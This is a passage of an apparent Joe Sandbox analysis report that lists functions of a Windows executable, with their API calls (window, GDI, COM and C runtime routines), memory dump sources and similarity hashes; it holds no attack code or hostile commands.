                                                                                                                    Function 00460C01 Relevance: 7.5, APIs: 5, Instructions: 48windowtimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                                    • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3741023627-0
                                                                                                                    • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                    • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                                    • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                    • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                                    Function 004556A0 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4023252218-0
                                                                                                                    • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                    • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                                    • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                    • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                                    Function 004555ED Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1489400265-0
                                                                                                                    • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                    • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                    • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                    • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                                    Function 00455607 Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                    • DestroyWindow.USER32(?), ref: 00455728
                                                                                                                    • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                    • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                    • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                    • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1042038666-0
                                                                                                                    • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                    • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                    • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                    • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                                    Function 0042FD29 Relevance: 7.5, APIs: 5, Instructions: 36COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2625713937-0
                                                                                                                    • Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                    • Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
                                                                                                                    • Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
                                                                                                                    • Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                                                    Function 00417803 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • __getptd.LIBCMT ref: 0041780F
                                                                                                                      • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                      • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                    • __getptd.LIBCMT ref: 00417826
                                                                                                                    • __amsg_exit.LIBCMT ref: 00417834
                                                                                                                    • __lock.LIBCMT ref: 00417844
                                                                                                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 938513278-0
                                                                                                                    • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                    • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                                    • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                    • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                                    Function 00413D0E Relevance: 7.5, APIs: 5, Instructions: 24threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                    • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                    • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2403457894-0
                                                                                                                    • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                    • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                                    • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                    • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                                    Function 004151AF Relevance: 7.5, APIs: 5, Instructions: 22threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                    • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                      • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                      • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                    • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                      • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                    • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                    • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                    • __freefls@4.LIBCMT ref: 00415209
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4247068974-0
                                                                                                                    • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                    • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                                    • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                    • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                                    Function 0044F405 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 302COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: )$U$\
                                                                                                                    • API String ID: 0-3705770531
                                                                                                                    • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                    • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                                    • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                    • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                                    Function 0046E48D Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                                    • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                                    • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                    • String ID: .lnk
                                                                                                                    • API String ID: 886957087-24824748
                                                                                                                    • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                    • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                                    • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                    • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                    Function 0044E180 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 4104443479-2967466578
                                                                                                                    • Opcode ID: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                    • Instruction ID: 90b25fc4546a2c21e21e7939c456fa175a28996bec6c3309f7edcf8d77039fcb
                                                                                                                    • Opcode Fuzzy Hash: 236e1e21dc65edc907fd0526d8e82b29cd887e6a6cae6abce2d2318f267918b8
                                                                                                                    • Instruction Fuzzy Hash: 8AB1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                    Function 0044E189 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 4104443479-2967466578
                                                                                                                    • Opcode ID: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                    • Instruction ID: 47d8400a167da4587eb122393216330e55bf30386b581c043e0675457d4a745f
                                                                                                                    • Opcode Fuzzy Hash: aaea77048b6460e77790bc9063151364371e311f89c51572a31744d174c5d814
                                                                                                                    • Instruction Fuzzy Hash: F1B1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED451AB381D7795946CB1A
                                                                                                                    Function 0044E199 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 260COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memmove
                                                                                                                    • String ID: \
                                                                                                                    • API String ID: 4104443479-2967466578
                                                                                                                    • Opcode ID: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                    • Instruction ID: 4d1558bed40bbae7f26d93592334ac0d2c658ca85fbb7fec499742c135aa7d63
                                                                                                                    • Opcode Fuzzy Hash: 51371dbcd6d614fdce5bfd4d2520a50a5cfc61004088100711ab8bbb78939718
                                                                                                                    • Instruction Fuzzy Hash: E5A1C270D04289CFEF15CFA9C8807AEBBB2BF55308F28419ED441AB381D7795946CB1A
                                                                                                                    Function 0046A6E1 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 241COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
